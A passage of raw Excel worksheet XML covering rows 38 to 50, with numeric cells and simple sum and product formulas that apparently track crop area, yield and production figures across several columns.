        <f t="shared" si="120"/>
        <v>581.4</v>
      </c>
      <c r="U38" s="12">
        <v>740.9</v>
      </c>
      <c r="V38" s="87">
        <f t="shared" ref="V38:X38" si="121">V41+V45+V49</f>
        <v>640.55999999999995</v>
      </c>
      <c r="W38" s="12"/>
      <c r="X38" s="11">
        <f t="shared" si="121"/>
        <v>298.39999999999998</v>
      </c>
      <c r="Y38" s="12">
        <v>380.9</v>
      </c>
      <c r="Z38" s="87">
        <f t="shared" ref="Z38:AB38" si="122">Z41+Z45+Z49</f>
        <v>306</v>
      </c>
      <c r="AA38" s="12"/>
      <c r="AB38" s="11">
        <f t="shared" si="122"/>
        <v>424.6</v>
      </c>
      <c r="AC38" s="12"/>
      <c r="AD38" s="87">
        <f t="shared" ref="AD38:AF38" si="123">AD41+AD45+AD49</f>
        <v>429.22</v>
      </c>
      <c r="AE38" s="12"/>
      <c r="AF38" s="11">
        <f t="shared" si="123"/>
        <v>595.20000000000005</v>
      </c>
      <c r="AG38" s="87">
        <f t="shared" ref="AG38:AI38" si="124">AG41+AG45+AG49</f>
        <v>613.43999999999994</v>
      </c>
      <c r="AH38" s="12"/>
      <c r="AI38" s="11">
        <f t="shared" si="124"/>
        <v>216</v>
      </c>
      <c r="AJ38" s="87">
        <f t="shared" ref="AJ38:AL38" si="125">AJ41+AJ45+AJ49</f>
        <v>225.72000000000003</v>
      </c>
      <c r="AK38" s="12"/>
      <c r="AL38" s="11">
        <f t="shared" si="125"/>
        <v>954</v>
      </c>
      <c r="AM38" s="87">
        <f t="shared" ref="AM38" si="126">AM41+AM45+AM49</f>
        <v>959.40600000000018</v>
      </c>
      <c r="AN38" s="87"/>
      <c r="AO38" s="87"/>
      <c r="AP38" s="74"/>
      <c r="AQ38" s="91"/>
    </row>
    <row r="39" spans="1:43" s="195" customFormat="1" ht="22.5" customHeight="1">
      <c r="A39" s="102" t="s">
        <v>33</v>
      </c>
      <c r="B39" s="101" t="s">
        <v>73</v>
      </c>
      <c r="C39" s="103" t="s">
        <v>1</v>
      </c>
      <c r="D39" s="104">
        <v>12</v>
      </c>
      <c r="E39" s="83">
        <v>10</v>
      </c>
      <c r="F39" s="104">
        <v>0</v>
      </c>
      <c r="G39" s="104">
        <v>0</v>
      </c>
      <c r="H39" s="104">
        <v>6</v>
      </c>
      <c r="I39" s="104">
        <v>4</v>
      </c>
      <c r="J39" s="104">
        <v>0</v>
      </c>
      <c r="K39" s="104"/>
      <c r="L39" s="104">
        <v>0</v>
      </c>
      <c r="M39" s="105">
        <v>10</v>
      </c>
      <c r="N39" s="98">
        <f>P39+T39+X39+AB39+AF39+AI39+AL39</f>
        <v>10</v>
      </c>
      <c r="O39" s="86">
        <f>R39+V39+Z39+AD39+AG39+AJ39+AM39</f>
        <v>10</v>
      </c>
      <c r="P39" s="38">
        <v>0</v>
      </c>
      <c r="Q39" s="39">
        <v>0</v>
      </c>
      <c r="R39" s="106">
        <v>0</v>
      </c>
      <c r="S39" s="39"/>
      <c r="T39" s="38">
        <v>0</v>
      </c>
      <c r="U39" s="39">
        <v>0</v>
      </c>
      <c r="V39" s="106">
        <v>0</v>
      </c>
      <c r="W39" s="39"/>
      <c r="X39" s="38">
        <v>6</v>
      </c>
      <c r="Y39" s="39">
        <v>6</v>
      </c>
      <c r="Z39" s="106">
        <v>6</v>
      </c>
      <c r="AA39" s="39"/>
      <c r="AB39" s="38">
        <v>4</v>
      </c>
      <c r="AC39" s="39"/>
      <c r="AD39" s="106">
        <v>4</v>
      </c>
      <c r="AE39" s="39"/>
      <c r="AF39" s="38">
        <v>0</v>
      </c>
      <c r="AG39" s="106">
        <v>0</v>
      </c>
      <c r="AH39" s="39"/>
      <c r="AI39" s="38">
        <v>0</v>
      </c>
      <c r="AJ39" s="106"/>
      <c r="AK39" s="39"/>
      <c r="AL39" s="38">
        <v>0</v>
      </c>
      <c r="AM39" s="106">
        <v>0</v>
      </c>
      <c r="AN39" s="106"/>
      <c r="AO39" s="73">
        <f>O39/N39*100</f>
        <v>100</v>
      </c>
      <c r="AP39" s="74">
        <f>O39-M39</f>
        <v>0</v>
      </c>
      <c r="AQ39" s="107"/>
    </row>
    <row r="40" spans="1:43" ht="22.5" customHeight="1">
      <c r="A40" s="68" t="s">
        <v>3</v>
      </c>
      <c r="B40" s="81" t="s">
        <v>11</v>
      </c>
      <c r="C40" s="25" t="s">
        <v>2</v>
      </c>
      <c r="D40" s="89">
        <v>54</v>
      </c>
      <c r="E40" s="83">
        <f>E41/E39*10</f>
        <v>54.399999999999991</v>
      </c>
      <c r="F40" s="89"/>
      <c r="G40" s="89"/>
      <c r="H40" s="89">
        <v>54</v>
      </c>
      <c r="I40" s="89">
        <v>55</v>
      </c>
      <c r="J40" s="89"/>
      <c r="K40" s="89"/>
      <c r="L40" s="89"/>
      <c r="M40" s="85">
        <f>M41/M39*10</f>
        <v>54.399999999999991</v>
      </c>
      <c r="N40" s="98">
        <f>N41/N39*10</f>
        <v>54.399999999999991</v>
      </c>
      <c r="O40" s="86">
        <f>O41/O39*10</f>
        <v>54.399999999999991</v>
      </c>
      <c r="P40" s="11">
        <v>0</v>
      </c>
      <c r="Q40" s="12"/>
      <c r="R40" s="87"/>
      <c r="S40" s="12"/>
      <c r="T40" s="11">
        <v>0</v>
      </c>
      <c r="U40" s="12"/>
      <c r="V40" s="87"/>
      <c r="W40" s="12"/>
      <c r="X40" s="11">
        <v>54</v>
      </c>
      <c r="Y40" s="12">
        <v>54</v>
      </c>
      <c r="Z40" s="87">
        <v>54</v>
      </c>
      <c r="AA40" s="12"/>
      <c r="AB40" s="11">
        <v>55</v>
      </c>
      <c r="AC40" s="12"/>
      <c r="AD40" s="87">
        <v>55</v>
      </c>
      <c r="AE40" s="12"/>
      <c r="AF40" s="11"/>
      <c r="AG40" s="87"/>
      <c r="AH40" s="12"/>
      <c r="AI40" s="11">
        <v>0</v>
      </c>
      <c r="AJ40" s="87"/>
      <c r="AK40" s="12"/>
      <c r="AL40" s="11">
        <v>0</v>
      </c>
      <c r="AM40" s="87"/>
      <c r="AN40" s="87"/>
      <c r="AO40" s="87"/>
      <c r="AP40" s="74"/>
      <c r="AQ40" s="91"/>
    </row>
    <row r="41" spans="1:43" ht="22.5" customHeight="1">
      <c r="A41" s="68" t="s">
        <v>3</v>
      </c>
      <c r="B41" s="81" t="s">
        <v>12</v>
      </c>
      <c r="C41" s="25" t="s">
        <v>36</v>
      </c>
      <c r="D41" s="89">
        <v>62</v>
      </c>
      <c r="E41" s="83">
        <v>54.4</v>
      </c>
      <c r="F41" s="89">
        <v>0</v>
      </c>
      <c r="G41" s="89">
        <v>0</v>
      </c>
      <c r="H41" s="89">
        <f>H40*H39/10</f>
        <v>32.4</v>
      </c>
      <c r="I41" s="89">
        <f>I40*I39/10</f>
        <v>22</v>
      </c>
      <c r="J41" s="89">
        <v>0</v>
      </c>
      <c r="K41" s="89">
        <f>K40*K39/10</f>
        <v>0</v>
      </c>
      <c r="L41" s="89">
        <v>0</v>
      </c>
      <c r="M41" s="85">
        <v>54.4</v>
      </c>
      <c r="N41" s="98">
        <f>P41+T41+X41+AB41+AF41+AI41+AL41</f>
        <v>54.4</v>
      </c>
      <c r="O41" s="86">
        <f>R41+V41+Z41+AD41+AG41+AJ41+AM41</f>
        <v>54.4</v>
      </c>
      <c r="P41" s="11">
        <v>0</v>
      </c>
      <c r="Q41" s="12">
        <v>0</v>
      </c>
      <c r="R41" s="87">
        <v>0</v>
      </c>
      <c r="S41" s="12"/>
      <c r="T41" s="11">
        <v>0</v>
      </c>
      <c r="U41" s="12">
        <v>0</v>
      </c>
      <c r="V41" s="87">
        <v>0</v>
      </c>
      <c r="W41" s="12"/>
      <c r="X41" s="11">
        <f>X40*X39/10</f>
        <v>32.4</v>
      </c>
      <c r="Y41" s="12">
        <v>32.4</v>
      </c>
      <c r="Z41" s="87">
        <f>Z40*Z39/10</f>
        <v>32.4</v>
      </c>
      <c r="AA41" s="12"/>
      <c r="AB41" s="11">
        <f>AB40*AB39/10</f>
        <v>22</v>
      </c>
      <c r="AC41" s="12"/>
      <c r="AD41" s="87">
        <f>AD40*AD39/10</f>
        <v>22</v>
      </c>
      <c r="AE41" s="12"/>
      <c r="AF41" s="11">
        <v>0</v>
      </c>
      <c r="AG41" s="87">
        <v>0</v>
      </c>
      <c r="AH41" s="12"/>
      <c r="AI41" s="11">
        <f>AI40*AI39/10</f>
        <v>0</v>
      </c>
      <c r="AJ41" s="87">
        <f>AJ40*AJ39/10</f>
        <v>0</v>
      </c>
      <c r="AK41" s="12"/>
      <c r="AL41" s="11">
        <v>0</v>
      </c>
      <c r="AM41" s="87">
        <v>0</v>
      </c>
      <c r="AN41" s="87"/>
      <c r="AO41" s="87"/>
      <c r="AP41" s="74"/>
      <c r="AQ41" s="91"/>
    </row>
    <row r="42" spans="1:43" s="195" customFormat="1" ht="22.5" customHeight="1">
      <c r="A42" s="102" t="s">
        <v>15</v>
      </c>
      <c r="B42" s="101" t="s">
        <v>46</v>
      </c>
      <c r="C42" s="103" t="s">
        <v>39</v>
      </c>
      <c r="D42" s="104"/>
      <c r="E42" s="71"/>
      <c r="F42" s="104"/>
      <c r="G42" s="104"/>
      <c r="H42" s="104"/>
      <c r="I42" s="104"/>
      <c r="J42" s="104"/>
      <c r="K42" s="104"/>
      <c r="L42" s="104"/>
      <c r="M42" s="105"/>
      <c r="N42" s="196"/>
      <c r="O42" s="73"/>
      <c r="P42" s="38"/>
      <c r="Q42" s="39"/>
      <c r="R42" s="73"/>
      <c r="S42" s="33"/>
      <c r="T42" s="38"/>
      <c r="U42" s="39"/>
      <c r="V42" s="73"/>
      <c r="W42" s="33"/>
      <c r="X42" s="38"/>
      <c r="Y42" s="39"/>
      <c r="Z42" s="73"/>
      <c r="AA42" s="33"/>
      <c r="AB42" s="38"/>
      <c r="AC42" s="39"/>
      <c r="AD42" s="73"/>
      <c r="AE42" s="33"/>
      <c r="AF42" s="38"/>
      <c r="AG42" s="73"/>
      <c r="AH42" s="33"/>
      <c r="AI42" s="38"/>
      <c r="AJ42" s="73"/>
      <c r="AK42" s="33"/>
      <c r="AL42" s="38"/>
      <c r="AM42" s="73"/>
      <c r="AN42" s="73"/>
      <c r="AO42" s="106"/>
      <c r="AP42" s="74"/>
      <c r="AQ42" s="107"/>
    </row>
    <row r="43" spans="1:43" ht="22.5" customHeight="1">
      <c r="A43" s="68" t="s">
        <v>34</v>
      </c>
      <c r="B43" s="81" t="s">
        <v>10</v>
      </c>
      <c r="C43" s="25" t="s">
        <v>1</v>
      </c>
      <c r="D43" s="89">
        <v>625</v>
      </c>
      <c r="E43" s="83">
        <v>630.5</v>
      </c>
      <c r="F43" s="89">
        <v>124</v>
      </c>
      <c r="G43" s="89">
        <v>102</v>
      </c>
      <c r="H43" s="89">
        <v>47.5</v>
      </c>
      <c r="I43" s="89">
        <v>66</v>
      </c>
      <c r="J43" s="89">
        <v>96</v>
      </c>
      <c r="K43" s="89">
        <v>32</v>
      </c>
      <c r="L43" s="89">
        <v>159</v>
      </c>
      <c r="M43" s="85">
        <v>626.5</v>
      </c>
      <c r="N43" s="98">
        <f>P43+T43+X43+AB43+AF43+AI43+AL43</f>
        <v>630.5</v>
      </c>
      <c r="O43" s="86">
        <f>R43+V43+Z43+AD43+AG43+AJ43+AM43</f>
        <v>630.5</v>
      </c>
      <c r="P43" s="11">
        <v>124</v>
      </c>
      <c r="Q43" s="12">
        <v>124</v>
      </c>
      <c r="R43" s="87">
        <v>124</v>
      </c>
      <c r="S43" s="33">
        <f>R43-Q43</f>
        <v>0</v>
      </c>
      <c r="T43" s="11">
        <v>102</v>
      </c>
      <c r="U43" s="12">
        <v>102</v>
      </c>
      <c r="V43" s="87">
        <v>102</v>
      </c>
      <c r="W43" s="12"/>
      <c r="X43" s="11">
        <v>47.5</v>
      </c>
      <c r="Y43" s="12">
        <v>47.5</v>
      </c>
      <c r="Z43" s="87">
        <v>47.5</v>
      </c>
      <c r="AA43" s="12"/>
      <c r="AB43" s="11">
        <v>66</v>
      </c>
      <c r="AC43" s="12"/>
      <c r="AD43" s="87">
        <v>66</v>
      </c>
      <c r="AE43" s="12"/>
      <c r="AF43" s="11">
        <v>96</v>
      </c>
      <c r="AG43" s="87">
        <v>96</v>
      </c>
      <c r="AH43" s="12"/>
      <c r="AI43" s="11">
        <v>36</v>
      </c>
      <c r="AJ43" s="87">
        <v>36</v>
      </c>
      <c r="AK43" s="12"/>
      <c r="AL43" s="11">
        <v>159</v>
      </c>
      <c r="AM43" s="87">
        <v>159</v>
      </c>
      <c r="AN43" s="87"/>
      <c r="AO43" s="87"/>
      <c r="AP43" s="74">
        <f>O43-M43</f>
        <v>4</v>
      </c>
      <c r="AQ43" s="91"/>
    </row>
    <row r="44" spans="1:43" ht="22.5" customHeight="1">
      <c r="A44" s="68" t="s">
        <v>35</v>
      </c>
      <c r="B44" s="81" t="s">
        <v>11</v>
      </c>
      <c r="C44" s="25" t="s">
        <v>2</v>
      </c>
      <c r="D44" s="89">
        <v>59</v>
      </c>
      <c r="E44" s="83">
        <f>E45/E43*10</f>
        <v>58.835844567803335</v>
      </c>
      <c r="F44" s="89">
        <v>56</v>
      </c>
      <c r="G44" s="89">
        <v>57</v>
      </c>
      <c r="H44" s="89">
        <v>56</v>
      </c>
      <c r="I44" s="89">
        <v>61</v>
      </c>
      <c r="J44" s="89">
        <v>62</v>
      </c>
      <c r="K44" s="89">
        <v>60</v>
      </c>
      <c r="L44" s="89">
        <v>60</v>
      </c>
      <c r="M44" s="90">
        <f>M45/M43*10</f>
        <v>58.828411811652039</v>
      </c>
      <c r="N44" s="98">
        <f>N45/N43*10</f>
        <v>58.835844567803335</v>
      </c>
      <c r="O44" s="87">
        <f>O45/O43*10</f>
        <v>60.595495638382232</v>
      </c>
      <c r="P44" s="11">
        <v>56</v>
      </c>
      <c r="Q44" s="12">
        <v>56</v>
      </c>
      <c r="R44" s="87">
        <v>56.5</v>
      </c>
      <c r="S44" s="12"/>
      <c r="T44" s="11">
        <v>57</v>
      </c>
      <c r="U44" s="12">
        <v>57</v>
      </c>
      <c r="V44" s="87">
        <v>62.8</v>
      </c>
      <c r="W44" s="12"/>
      <c r="X44" s="11">
        <v>56</v>
      </c>
      <c r="Y44" s="12">
        <v>56</v>
      </c>
      <c r="Z44" s="87">
        <v>57.6</v>
      </c>
      <c r="AA44" s="12"/>
      <c r="AB44" s="11">
        <v>61</v>
      </c>
      <c r="AC44" s="12"/>
      <c r="AD44" s="87">
        <v>61.7</v>
      </c>
      <c r="AE44" s="12"/>
      <c r="AF44" s="11">
        <v>62</v>
      </c>
      <c r="AG44" s="87">
        <v>63.9</v>
      </c>
      <c r="AH44" s="12"/>
      <c r="AI44" s="11">
        <v>60</v>
      </c>
      <c r="AJ44" s="87">
        <v>62.7</v>
      </c>
      <c r="AK44" s="12"/>
      <c r="AL44" s="11">
        <v>60</v>
      </c>
      <c r="AM44" s="87">
        <v>60.34</v>
      </c>
      <c r="AN44" s="87"/>
      <c r="AO44" s="87"/>
      <c r="AP44" s="74"/>
      <c r="AQ44" s="91"/>
    </row>
    <row r="45" spans="1:43" ht="22.5" customHeight="1">
      <c r="A45" s="68" t="s">
        <v>34</v>
      </c>
      <c r="B45" s="81" t="s">
        <v>12</v>
      </c>
      <c r="C45" s="25" t="s">
        <v>36</v>
      </c>
      <c r="D45" s="89">
        <v>3679</v>
      </c>
      <c r="E45" s="83">
        <v>3709.6000000000004</v>
      </c>
      <c r="F45" s="89">
        <f t="shared" ref="F45:L45" si="127">F44*F43/10</f>
        <v>694.4</v>
      </c>
      <c r="G45" s="89">
        <f t="shared" si="127"/>
        <v>581.4</v>
      </c>
      <c r="H45" s="89">
        <f t="shared" si="127"/>
        <v>266</v>
      </c>
      <c r="I45" s="89">
        <f t="shared" si="127"/>
        <v>402.6</v>
      </c>
      <c r="J45" s="89">
        <f t="shared" si="127"/>
        <v>595.20000000000005</v>
      </c>
      <c r="K45" s="89">
        <f t="shared" si="127"/>
        <v>192</v>
      </c>
      <c r="L45" s="89">
        <f t="shared" si="127"/>
        <v>954</v>
      </c>
      <c r="M45" s="85">
        <v>3685.6</v>
      </c>
      <c r="N45" s="98">
        <f>P45+T45+X45+AB45+AF45+AI45+AL45</f>
        <v>3709.6000000000004</v>
      </c>
      <c r="O45" s="86">
        <f>R45+V45+Z45+AD45+AG45+AJ45+AM45</f>
        <v>3820.5459999999994</v>
      </c>
      <c r="P45" s="11">
        <f t="shared" ref="P45" si="128">P44*P43/10</f>
        <v>694.4</v>
      </c>
      <c r="Q45" s="12">
        <v>694.4</v>
      </c>
      <c r="R45" s="87">
        <f t="shared" ref="R45:T45" si="129">R44*R43/10</f>
        <v>700.6</v>
      </c>
      <c r="S45" s="12"/>
      <c r="T45" s="11">
        <f t="shared" si="129"/>
        <v>581.4</v>
      </c>
      <c r="U45" s="12">
        <v>581.4</v>
      </c>
      <c r="V45" s="87">
        <f t="shared" ref="V45:X45" si="130">V44*V43/10</f>
        <v>640.55999999999995</v>
      </c>
      <c r="W45" s="12"/>
      <c r="X45" s="11">
        <f t="shared" si="130"/>
        <v>266</v>
      </c>
      <c r="Y45" s="12">
        <v>266</v>
      </c>
      <c r="Z45" s="87">
        <f t="shared" ref="Z45:AB45" si="131">Z44*Z43/10</f>
        <v>273.60000000000002</v>
      </c>
      <c r="AA45" s="12"/>
      <c r="AB45" s="11">
        <f t="shared" si="131"/>
        <v>402.6</v>
      </c>
      <c r="AC45" s="12"/>
      <c r="AD45" s="87">
        <f t="shared" ref="AD45:AF45" si="132">AD44*AD43/10</f>
        <v>407.22</v>
      </c>
      <c r="AE45" s="12"/>
      <c r="AF45" s="11">
        <f t="shared" si="132"/>
        <v>595.20000000000005</v>
      </c>
      <c r="AG45" s="87">
        <f t="shared" ref="AG45:AI45" si="133">AG44*AG43/10</f>
        <v>613.43999999999994</v>
      </c>
      <c r="AH45" s="12"/>
      <c r="AI45" s="11">
        <f t="shared" si="133"/>
        <v>216</v>
      </c>
      <c r="AJ45" s="87">
        <f t="shared" ref="AJ45:AL45" si="134">AJ44*AJ43/10</f>
        <v>225.72000000000003</v>
      </c>
      <c r="AK45" s="12"/>
      <c r="AL45" s="11">
        <f t="shared" si="134"/>
        <v>954</v>
      </c>
      <c r="AM45" s="87">
        <f t="shared" ref="AM45" si="135">AM44*AM43/10</f>
        <v>959.40600000000018</v>
      </c>
      <c r="AN45" s="87"/>
      <c r="AO45" s="87"/>
      <c r="AP45" s="74"/>
      <c r="AQ45" s="91"/>
    </row>
    <row r="46" spans="1:43" s="195" customFormat="1" ht="22.5" customHeight="1">
      <c r="A46" s="102" t="s">
        <v>89</v>
      </c>
      <c r="B46" s="101" t="s">
        <v>38</v>
      </c>
      <c r="C46" s="108"/>
      <c r="D46" s="104"/>
      <c r="E46" s="71"/>
      <c r="F46" s="104"/>
      <c r="G46" s="104"/>
      <c r="H46" s="104"/>
      <c r="I46" s="104"/>
      <c r="J46" s="104"/>
      <c r="K46" s="104"/>
      <c r="L46" s="104"/>
      <c r="M46" s="105"/>
      <c r="N46" s="196"/>
      <c r="O46" s="73"/>
      <c r="P46" s="38"/>
      <c r="Q46" s="39"/>
      <c r="R46" s="106"/>
      <c r="S46" s="39"/>
      <c r="T46" s="38"/>
      <c r="U46" s="39"/>
      <c r="V46" s="106"/>
      <c r="W46" s="39"/>
      <c r="X46" s="38"/>
      <c r="Y46" s="39"/>
      <c r="Z46" s="106"/>
      <c r="AA46" s="39"/>
      <c r="AB46" s="38"/>
      <c r="AC46" s="39"/>
      <c r="AD46" s="106"/>
      <c r="AE46" s="39"/>
      <c r="AF46" s="38"/>
      <c r="AG46" s="106"/>
      <c r="AH46" s="39"/>
      <c r="AI46" s="38"/>
      <c r="AJ46" s="106"/>
      <c r="AK46" s="39"/>
      <c r="AL46" s="38"/>
      <c r="AM46" s="106"/>
      <c r="AN46" s="106"/>
      <c r="AO46" s="106"/>
      <c r="AP46" s="74"/>
      <c r="AQ46" s="107"/>
    </row>
    <row r="47" spans="1:43" ht="22.5" customHeight="1">
      <c r="A47" s="68" t="s">
        <v>34</v>
      </c>
      <c r="B47" s="81" t="s">
        <v>10</v>
      </c>
      <c r="C47" s="25" t="s">
        <v>1</v>
      </c>
      <c r="D47" s="89">
        <v>141</v>
      </c>
      <c r="E47" s="83">
        <v>143</v>
      </c>
      <c r="F47" s="89">
        <v>16</v>
      </c>
      <c r="G47" s="89">
        <v>29</v>
      </c>
      <c r="H47" s="89">
        <v>15</v>
      </c>
      <c r="I47" s="89">
        <v>22</v>
      </c>
      <c r="J47" s="89">
        <v>36</v>
      </c>
      <c r="K47" s="89">
        <v>14</v>
      </c>
      <c r="L47" s="89">
        <v>15</v>
      </c>
      <c r="M47" s="85">
        <v>147</v>
      </c>
      <c r="N47" s="98">
        <f>P47+T47+X47+AB47+AF47+AI47+AL47</f>
        <v>143</v>
      </c>
      <c r="O47" s="86">
        <f>R47+V47+Z47+AD47+AG47+AJ47+AM47</f>
        <v>143</v>
      </c>
      <c r="P47" s="11">
        <v>16</v>
      </c>
      <c r="Q47" s="12">
        <v>16</v>
      </c>
      <c r="R47" s="87">
        <v>16</v>
      </c>
      <c r="S47" s="12"/>
      <c r="T47" s="11">
        <v>29</v>
      </c>
      <c r="U47" s="12">
        <v>29</v>
      </c>
      <c r="V47" s="87">
        <v>29</v>
      </c>
      <c r="W47" s="12"/>
      <c r="X47" s="11">
        <v>15</v>
      </c>
      <c r="Y47" s="12">
        <v>15</v>
      </c>
      <c r="Z47" s="87">
        <v>15</v>
      </c>
      <c r="AA47" s="12"/>
      <c r="AB47" s="11">
        <v>22</v>
      </c>
      <c r="AC47" s="12"/>
      <c r="AD47" s="87">
        <v>22</v>
      </c>
      <c r="AE47" s="12"/>
      <c r="AF47" s="11">
        <v>36</v>
      </c>
      <c r="AG47" s="87">
        <v>36</v>
      </c>
      <c r="AH47" s="12"/>
      <c r="AI47" s="11">
        <v>10</v>
      </c>
      <c r="AJ47" s="87">
        <v>10</v>
      </c>
      <c r="AK47" s="12"/>
      <c r="AL47" s="11">
        <v>15</v>
      </c>
      <c r="AM47" s="87">
        <v>15</v>
      </c>
      <c r="AN47" s="87"/>
      <c r="AO47" s="87"/>
      <c r="AP47" s="74"/>
      <c r="AQ47" s="91"/>
    </row>
    <row r="48" spans="1:43" ht="22.5" customHeight="1">
      <c r="A48" s="68" t="s">
        <v>35</v>
      </c>
      <c r="B48" s="81" t="s">
        <v>11</v>
      </c>
      <c r="C48" s="25" t="s">
        <v>2</v>
      </c>
      <c r="D48" s="89">
        <v>57</v>
      </c>
      <c r="E48" s="83">
        <f>E49/E47*10</f>
        <v>56.993006993006993</v>
      </c>
      <c r="F48" s="89">
        <v>55</v>
      </c>
      <c r="G48" s="89">
        <v>55</v>
      </c>
      <c r="H48" s="89">
        <v>55</v>
      </c>
      <c r="I48" s="89">
        <v>60</v>
      </c>
      <c r="J48" s="89">
        <v>60</v>
      </c>
      <c r="K48" s="89">
        <v>56</v>
      </c>
      <c r="L48" s="89">
        <v>54</v>
      </c>
      <c r="M48" s="85"/>
      <c r="N48" s="98">
        <f>N49/N47*10</f>
        <v>6.1538461538461542</v>
      </c>
      <c r="O48" s="87">
        <f>O49/O47*10</f>
        <v>0</v>
      </c>
      <c r="P48" s="11">
        <v>55</v>
      </c>
      <c r="Q48" s="12">
        <v>55</v>
      </c>
      <c r="R48" s="87"/>
      <c r="S48" s="12"/>
      <c r="T48" s="11"/>
      <c r="U48" s="12"/>
      <c r="V48" s="87"/>
      <c r="W48" s="12"/>
      <c r="X48" s="11"/>
      <c r="Y48" s="12"/>
      <c r="Z48" s="87"/>
      <c r="AA48" s="12"/>
      <c r="AB48" s="11"/>
      <c r="AC48" s="12"/>
      <c r="AD48" s="87"/>
      <c r="AE48" s="12"/>
      <c r="AF48" s="11"/>
      <c r="AG48" s="87"/>
      <c r="AH48" s="12"/>
      <c r="AI48" s="11"/>
      <c r="AJ48" s="87"/>
      <c r="AK48" s="12"/>
      <c r="AL48" s="11"/>
      <c r="AM48" s="87"/>
      <c r="AN48" s="87"/>
      <c r="AO48" s="87"/>
      <c r="AP48" s="74"/>
      <c r="AQ48" s="91"/>
    </row>
    <row r="49" spans="1:43" ht="22.5" customHeight="1">
      <c r="A49" s="68" t="s">
        <v>34</v>
      </c>
      <c r="B49" s="81" t="s">
        <v>12</v>
      </c>
      <c r="C49" s="25" t="s">
        <v>36</v>
      </c>
      <c r="D49" s="89">
        <v>810</v>
      </c>
      <c r="E49" s="83">
        <v>815</v>
      </c>
      <c r="F49" s="89">
        <f t="shared" ref="F49:L49" si="136">F48*F47/10</f>
        <v>88</v>
      </c>
      <c r="G49" s="89">
        <f t="shared" si="136"/>
        <v>159.5</v>
      </c>
      <c r="H49" s="89">
        <f t="shared" si="136"/>
        <v>82.5</v>
      </c>
      <c r="I49" s="89">
        <f t="shared" si="136"/>
        <v>132</v>
      </c>
      <c r="J49" s="89">
        <f t="shared" si="136"/>
        <v>216</v>
      </c>
      <c r="K49" s="89">
        <f t="shared" si="136"/>
        <v>78.400000000000006</v>
      </c>
      <c r="L49" s="89">
        <f t="shared" si="136"/>
        <v>81</v>
      </c>
      <c r="M49" s="85"/>
      <c r="N49" s="98">
        <f>P49+T49+X49+AB49+AF49+AI49+AL49</f>
        <v>88</v>
      </c>
      <c r="O49" s="86">
        <f>R49+V49+Z49+AD49+AG49+AJ49+AM49</f>
        <v>0</v>
      </c>
      <c r="P49" s="11">
        <f t="shared" ref="P49" si="137">P48*P47/10</f>
        <v>88</v>
      </c>
      <c r="Q49" s="12">
        <v>88</v>
      </c>
      <c r="R49" s="87"/>
      <c r="S49" s="12"/>
      <c r="T49" s="11"/>
      <c r="U49" s="12"/>
      <c r="V49" s="87"/>
      <c r="W49" s="12"/>
      <c r="X49" s="11"/>
      <c r="Y49" s="12"/>
      <c r="Z49" s="87"/>
      <c r="AA49" s="12"/>
      <c r="AB49" s="11"/>
      <c r="AC49" s="12"/>
      <c r="AD49" s="87"/>
      <c r="AE49" s="12"/>
      <c r="AF49" s="11"/>
      <c r="AG49" s="87"/>
      <c r="AH49" s="12"/>
      <c r="AI49" s="11"/>
      <c r="AJ49" s="87"/>
      <c r="AK49" s="12"/>
      <c r="AL49" s="11"/>
      <c r="AM49" s="87"/>
      <c r="AN49" s="87"/>
      <c r="AO49" s="87"/>
      <c r="AP49" s="74"/>
      <c r="AQ49" s="91"/>
    </row>
    <row r="50" spans="1:43" ht="22.5" customHeight="1">
      <c r="A50" s="76">
        <v>3</v>
      </c>
      <c r="B50" s="24" t="s">
        <v>69</v>
      </c>
      <c r="C50" s="69" t="s">
        <v>1</v>
      </c>
      <c r="D50" s="70">
        <v>4176</v>
      </c>
      <c r="E50" s="71">
        <f>E52+E56</f>
        <v>4051.2</v>
      </c>
      <c r="F50" s="71">
        <f>F52+F56</f>
        <v>229.6</v>
      </c>
      <c r="G50" s="71">
        <f t="shared" ref="G50:L50" si="138">G52+G56</f>
        <v>795</v>
      </c>
      <c r="H50" s="71">
        <f t="shared" si="138"/>
        <v>887.05</v>
      </c>
      <c r="I50" s="71">
        <f t="shared" si="138"/>
        <v>563.4</v>
      </c>
      <c r="J50" s="71">
        <f t="shared" si="138"/>
        <v>925.52</v>
      </c>
      <c r="K50" s="71">
        <f t="shared" si="138"/>
        <v>371.16999999999996</v>
      </c>
      <c r="L50" s="71">
        <f t="shared" si="138"/>
        <v>223.2</v>
      </c>
      <c r="M50" s="109">
        <f>M52+M56</f>
        <v>3926.78</v>
      </c>
      <c r="N50" s="73">
        <f>N52+N56</f>
        <v>3733.47</v>
      </c>
      <c r="O50" s="73">
        <f>O52+O56</f>
        <v>3792.3300000000004</v>
      </c>
      <c r="P50" s="32">
        <f t="shared" ref="P50" si="139">P52+P56</f>
        <v>218.6</v>
      </c>
      <c r="Q50" s="33">
        <v>229.6</v>
      </c>
      <c r="R50" s="73">
        <f>R52+R56</f>
        <v>218.6</v>
      </c>
      <c r="S50" s="33"/>
      <c r="T50" s="32">
        <f t="shared" ref="T50" si="140">T52+T56</f>
        <v>761.15</v>
      </c>
      <c r="U50" s="33">
        <v>795</v>
      </c>
      <c r="V50" s="73">
        <f t="shared" ref="V50:X50" si="141">V52+V56</f>
        <v>772</v>
      </c>
      <c r="W50" s="33"/>
      <c r="X50" s="32">
        <f t="shared" si="141"/>
        <v>835.05</v>
      </c>
      <c r="Y50" s="33">
        <v>887.05</v>
      </c>
      <c r="Z50" s="73">
        <f t="shared" ref="Z50:AB50" si="142">Z52+Z56</f>
        <v>865.05</v>
      </c>
      <c r="AA50" s="33"/>
      <c r="AB50" s="32">
        <f t="shared" si="142"/>
        <v>511</v>
      </c>
      <c r="AC50" s="33"/>
      <c r="AD50" s="73">
        <f t="shared" ref="AD50:AF50" si="143">AD52+AD56</f>
        <v>511</v>
      </c>
      <c r="AE50" s="33"/>
      <c r="AF50" s="32">
        <f t="shared" si="143"/>
        <v>886.7</v>
      </c>
      <c r="AG50" s="73">
        <f t="shared" ref="AG50:AI50" si="144">AG52+AG56</f>
        <v>894.67</v>
      </c>
      <c r="AH50" s="33"/>
      <c r="AI50" s="32">
        <f t="shared" si="144"/>
        <v>313.77000000000004</v>
      </c>
      <c r="AJ50" s="73">
        <f t="shared" ref="AJ50:AL50" si="145">AJ52+AJ56</f>
        <v>323.80999999999995</v>
      </c>
      <c r="AK50" s="33"/>
      <c r="AL50" s="32">
        <f t="shared" si="145"/>
        <v>207.2</v>
      </c>
      <c r="AM50" s="73">
        <f t="shared" ref="AM50" si="146">AM52+AM56</f>
        <v>207.2</v>
      </c>
      <c r="AN50" s="73"/>
